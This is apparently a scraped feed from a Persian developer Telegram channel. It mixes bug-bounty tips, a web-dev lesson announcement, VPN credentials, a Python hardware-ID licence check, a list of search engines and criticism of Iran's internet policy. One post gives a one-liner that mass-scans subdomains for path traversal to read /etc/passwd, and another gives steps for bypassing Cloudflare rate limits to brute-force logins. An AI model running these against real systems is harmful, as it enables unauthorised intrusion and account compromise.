Please open Telegram to view this post
VIEW IN TELEGRAM
دوستان برنامه نویس حتما حواستون به این موضوع باشه :
I just got a $15,000 #BugBounty for a UUID-based IDOR that led to an account takeover 🥷
Interestingly, the application used some fixed UUIDs like 00000000-0000-0000-0000-000000000000 and 11111111-1111-1111-1111-111111111111 for some _administrative_ users 🤷♂️
Link of tweet
#security
#InfoSec
@devefun🙃
I just got a $15,000 #BugBounty for a UUID-based IDOR that led to an account takeover 🥷
Interestingly, the application used some fixed UUIDs like 00000000-0000-0000-0000-000000000000 and 11111111-1111-1111-1111-111111111111 for some _administrative_ users 🤷♂️
Link of tweet
#security
#InfoSec
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
🐳8
برنامه نویسی به شرط خنده | Developer funs
دوستان برنامه نویس حتما حواستون به این موضوع باشه : I just got a $15,000 #BugBounty for a UUID-based IDOR that led to an account takeover 🥷 Interestingly, the application used some fixed UUIDs like 00000000-0000-0000-0000-000000000000 and 11111111-1111-1111…
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😐12
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
https://attacker-codeninja.github.io/2022-06-06-awesome-bug-bounty-roadmap/
این رود مپ برای کسایی که میخان وارد باگ بانتی و یا هک اپلیکیشن ها ( معمولا وب اپلیکیشن ) بشن هستش
اگه نیاز دیدین که ترجمه بشه و جاییشو متوجه نشدین تو کامنتا بگین😍 ( هر چند باید زبانتون در حدی باشه که اینارو متوجه بشین )
#BugBounty #RoadMap
@devefun😝
این رود مپ برای کسایی که میخان وارد باگ بانتی و یا هک اپلیکیشن ها ( معمولا وب اپلیکیشن ) بشن هستش
اگه نیاز دیدین که ترجمه بشه و جاییشو متوجه نشدین تو کامنتا بگین
#BugBounty #RoadMap
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
attacker-codeninja.github.io
Awesome Bug Bounty Roadmap
👍4
Media is too big
VIEW IN TELEGRAM
💢 فصل اول آموزش Full stack web developer
💢 عنوان فصل HTML & CSS - قسمت ۱۶
💢 مباحث تدریس شده:
✅ استفاده از CDN ها و font awesome
✅ کمی در مورد ریسپانسیو کردن صفحه
✅ معرفی اندازه vw بر اساس عرض viewport
✅ کسب مهارت بیشتر در inspector
✅ معرفی ویژگی های CSS از جمله:
curser
#فیلم_آموزش #FullStackWebDeveloper
⭕️ با انتشار این مطلب ما را حمایت کنید.
👇 تمرین این جلسه کانال «برنامهنویسی با طعم تمشک»
@xstack_tut 👻 | @devefun ✌️
💢 عنوان فصل HTML & CSS - قسمت ۱۶
💢 مباحث تدریس شده:
✅ استفاده از CDN ها و font awesome
✅ کمی در مورد ریسپانسیو کردن صفحه
✅ معرفی اندازه vw بر اساس عرض viewport
✅ کسب مهارت بیشتر در inspector
✅ معرفی ویژگی های CSS از جمله:
curser
#فیلم_آموزش #FullStackWebDeveloper
⭕️ با انتشار این مطلب ما را حمایت کنید.
👇 تمرین این جلسه کانال «برنامهنویسی با طعم تمشک»
@xstack_tut 👻 | @devefun ✌️
❤🔥7
New Exploit 🔥🔥🔥🔥
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
#bugbountytips #bugbountytip #bugbounty
Source [ + bounter ]
@devefun😝
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
#bugbountytips #bugbountytip #bugbounty
Source [ + bounter ]
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
🤨9
💢 وی پی ان OpenVPN ( با سرعت فوقالعاده) 👌
🔸 اعتبار یک ماه [Next Update. 2022-09-22]
🔹 دوستان خواهشا، فقط برای برنامه نویسها ارسال کنند
⚠️ عواقب استفاده غیر از موارد مجاز به عهده استفاده کننده می باشد
✅ فایل کانفیگ در قسمت کامنت ها
USR: devefun
PIN: 121212
🔸 ماه های آینده آپدیت تو کانال اعلام میشود 😉↙️
[دوستان لطفا به درستی از وی پی ان استفاده کنین... این بار چندمه که سرور یا داغون میشه یا داون میشه...]
@devefun😍
🔸 اعتبار یک ماه [Next Update. 2022-09-22]
🔹 دوستان خواهشا، فقط برای برنامه نویسها ارسال کنند
⚠️ عواقب استفاده غیر از موارد مجاز به عهده استفاده کننده می باشد
✅ فایل کانفیگ در قسمت کامنت ها
USR: devefun
PIN: 121212
🔸 ماه های آینده آپدیت تو کانال اعلام میشود 😉↙️
[دوستان لطفا به درستی از وی پی ان استفاده کنین... این بار چندمه که سرور یا داغون میشه یا داون میشه...]
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Bypass Cloudflare Rate Limit 2022 🔥🔥🔥
1. Go to login page
2. Enter credentials
3. Send request to intruder
4. Set change position for host header
5. Set change position for password
6. Enjoy brute forcing
#bugbountytips
Bypass Cloudflare Rate Limit
By 'Srivastava'
https://github.com/NafisiAslH/KnowledgeSharing/blob/main/CyberSecurity/Web/BugBountyTips/RateLimitBypass/20220823%20-%20Bypassing%20Cloudflare%20Rate%20Limit.md
Note: This trick works when unknown subdomains are redirected to main subdomain.
@devefun => join us👏
1. Go to login page
2. Enter credentials
3. Send request to intruder
4. Set change position for host header
5. Set change position for password
6. Enjoy brute forcing
#bugbountytips
Bypass Cloudflare Rate Limit
By 'Srivastava'
https://github.com/NafisiAslH/KnowledgeSharing/blob/main/CyberSecurity/Web/BugBountyTips/RateLimitBypass/20220823%20-%20Bypassing%20Cloudflare%20Rate%20Limit.md
Note: This trick works when unknown subdomains are redirected to main subdomain.
@devefun => join us
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
پروژهٔ خود را با استفاده از HWID محافظت کنید. 🐍 [python]
کد را در ابتدای پروژه خود اضافه کنید.
یک فایل TXT بسازید و اون رو داخل سرور خودتون آپلود کنید.
به فایل TXT که ساختین hardware IDs اضافه کنید.
مثال: https://devefun.com/hardware-ids.txt
لینک رو جایگزین `
✌️
کد را در ابتدای پروژه خود اضافه کنید.
یک فایل TXT بسازید و اون رو داخل سرور خودتون آپلود کنید.
به فایل TXT که ساختین hardware IDs اضافه کنید.
مثال: https://devefun.com/hardware-ids.txt
لینک رو جایگزین `
TYPE SITE HERE ` کنید.import subprocess, requests, time, os@devefun
hardwareid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
site = requests.get('TYPE SITE HERE')
try:
if hardwareid in site.text:
pass
else:
print('[ERROR] HWID NOT in database')
print('[HWID:' + hardwareid + ']')
time.sleep(5)
os._exit()
except:
print('[ERROR] FAILED to connect to database')
time.sleep(5)
os._exit()
print('Success.')
Please open Telegram to view this post
VIEW IN TELEGRAM
👌2👍1
موتورهای جستجوی ملی کشورهای مختلف 🔎
Philippines 🇵🇭 : Alleba ( https://www.alleba.com/ )
China 🇨🇳 : Baidu ( https://www.baidu.com/ )
Schweden 🇸🇪 : Eniro ( https://www.eniro.se/ )
Japan 🇯🇵 : Goo ( https://www.goo.ne.jp/ )
Slovenia 🇸🇮 : Najdsi ( https://www.najdi.si/ )
South Korea 🇰🇷 : Naver ( https://www.naver.com/ )
Poland 🇵🇱 : Onet.pl ( https://www.onet.pl/ )
France 🇫🇷 : Orange ( https://www.orange.fr/ )
Iran 🇮🇷 : Parseek ( https://www.parseek.com/ )
Germany 🇩🇪 : MetaGer ( https://metager.de/ )
Portugal 🇵🇹 : SAPO ( https://www.sapo.pt/ )
Switzerland 🇨🇭 : Search.ch ( https://www.search.ch/ )
Czech Repulic 🇨🇿 : Seznam ( https://seznam.cz/ )
Israel 🇮🇱 : Walla ( https://www.walla.co.il/ )
Russia 🇷🇺 : Yandex ( https://www.yandex.com/ )
Slovenia 🇸🇰 : Najdi.si ( https://www.najdi.si/ )
@devefun✌️
Philippines 🇵🇭 : Alleba ( https://www.alleba.com/ )
China 🇨🇳 : Baidu ( https://www.baidu.com/ )
Schweden 🇸🇪 : Eniro ( https://www.eniro.se/ )
Japan 🇯🇵 : Goo ( https://www.goo.ne.jp/ )
Slovenia 🇸🇮 : Najdsi ( https://www.najdi.si/ )
South Korea 🇰🇷 : Naver ( https://www.naver.com/ )
Poland 🇵🇱 : Onet.pl ( https://www.onet.pl/ )
France 🇫🇷 : Orange ( https://www.orange.fr/ )
Iran 🇮🇷 : Parseek ( https://www.parseek.com/ )
Germany 🇩🇪 : MetaGer ( https://metager.de/ )
Portugal 🇵🇹 : SAPO ( https://www.sapo.pt/ )
Switzerland 🇨🇭 : Search.ch ( https://www.search.ch/ )
Czech Repulic 🇨🇿 : Seznam ( https://seznam.cz/ )
Israel 🇮🇱 : Walla ( https://www.walla.co.il/ )
Russia 🇷🇺 : Yandex ( https://www.yandex.com/ )
Slovenia 🇸🇰 : Najdi.si ( https://www.najdi.si/ )
@devefun
Please open Telegram to view this post
VIEW IN TELEGRAM
💩3👍2👎1🔥1
در نقد عملکرد وزارت ارتباطات باید گفت مشکلی که با دولت داریم اینه که مشخص نمیکند تعریف و منظورش از اینترنت چیست. ما اینترنت را یک شبکه جهانی میدانیم که افراد در سراسر دنیا از آن استفاده میکنند، اما به نظر میرسد منظور دولت از اینترنت دسترسی به دو نقطه در داخل کشور است.
اسپیدتست آزمون درستی برای سنجش سرعت اینترنت نیست؛ چون عموما با یک دیتاسنتر داخلی تست را انجام میدهد و بنابراین، سرعت اینترنت داخلی را اندازه میگیرد، درحالیکه برای محاسبه سرعت اینترنت به سرعت اینترنت بینالملل نیاز داریم. استناد به اعداد اسپیدتست برای گمراه کردن مردم است.
ما در حوزه امنیت شبکه کار را برای خودمان سختتر کردیم. مثلا برای پروتکلهایی که میتوانند جلوی ۹۰ درصد از رخدادها را بگیرد، به بهانه فیلترشکن، اختلال ایجاد میکنیم و باعث میشویم 95 درصد از تهدیدهایی که در دنیا وجود دارد، برای ما ایجاد شود.
نتیجه محدودیتها این میشود که با دانش دو سال قبل با چالشهای امنیتی امروز مواجه میشویم. ما چند نسخه از دنیا عقب هستیم و باید کمکم همگام با سختافزارهای دنیا به شکستهایمان کمک کنیم و دانش امنیت خود را بهروز کنیم. این اتفاق با انحصار محقق نخواهد شد.
گزارشها نشان میدهد همان نکاتی که مورد اعتراض شهروندان و کاربران اینترنت قرار گرفته بهعنوان دستاورد وزارت ارتباطات عنوان شده. دولت در این خصوص رویکرد «همین که هست» داشته و از چشماندازی سیاهتر از امروز خبر میدهد.
دولت نهتنها ابایی از گزارش کردن این اختلالها نداشته بلکه به نظر میرسد خودش میخواهد که این اختلالات وجود داشته باشد.
اطلاعات کامل را در زومیت بخوانید:
@devefun
https://www.zoomit.ir/tech-iran/385510-ict-ministry-anuual-report/
اسپیدتست آزمون درستی برای سنجش سرعت اینترنت نیست؛ چون عموما با یک دیتاسنتر داخلی تست را انجام میدهد و بنابراین، سرعت اینترنت داخلی را اندازه میگیرد، درحالیکه برای محاسبه سرعت اینترنت به سرعت اینترنت بینالملل نیاز داریم. استناد به اعداد اسپیدتست برای گمراه کردن مردم است.
ما در حوزه امنیت شبکه کار را برای خودمان سختتر کردیم. مثلا برای پروتکلهایی که میتوانند جلوی ۹۰ درصد از رخدادها را بگیرد، به بهانه فیلترشکن، اختلال ایجاد میکنیم و باعث میشویم 95 درصد از تهدیدهایی که در دنیا وجود دارد، برای ما ایجاد شود.
نتیجه محدودیتها این میشود که با دانش دو سال قبل با چالشهای امنیتی امروز مواجه میشویم. ما چند نسخه از دنیا عقب هستیم و باید کمکم همگام با سختافزارهای دنیا به شکستهایمان کمک کنیم و دانش امنیت خود را بهروز کنیم. این اتفاق با انحصار محقق نخواهد شد.
گزارشها نشان میدهد همان نکاتی که مورد اعتراض شهروندان و کاربران اینترنت قرار گرفته بهعنوان دستاورد وزارت ارتباطات عنوان شده. دولت در این خصوص رویکرد «همین که هست» داشته و از چشماندازی سیاهتر از امروز خبر میدهد.
دولت نهتنها ابایی از گزارش کردن این اختلالها نداشته بلکه به نظر میرسد خودش میخواهد که این اختلالات وجود داشته باشد.
اطلاعات کامل را در زومیت بخوانید:
@devefun
https://www.zoomit.ir/tech-iran/385510-ict-ministry-anuual-report/
زومیت
موارد اعتراضی کاربران اینترنت، دستاورد وزارت ارتباطات عنوان شده است - زومیت
«نکاتی که مورد اعتراض شهروندان و کاربران اینترنت قرار گرفته بود بهعنوان دستاورد وزارت ارتباطات در نظر گرفته شده است.» این جمله خلاصهای است از گزارشی که وزارت ارتباطات از عملکرد یکسالهاش منتشر کرد.
👍4😢4